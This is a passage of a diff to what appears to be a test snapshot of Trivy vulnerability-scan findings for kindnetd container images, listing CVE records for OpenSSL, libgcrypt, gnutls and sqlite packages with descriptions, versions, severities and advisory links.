platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.8", - "packageName": "libdb5.3", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", - ], - }, - "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.openssl.org/news/secadv/20220705.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.7.1-5+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "value": "https://www.openssl.org/news/secadv/20230207.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 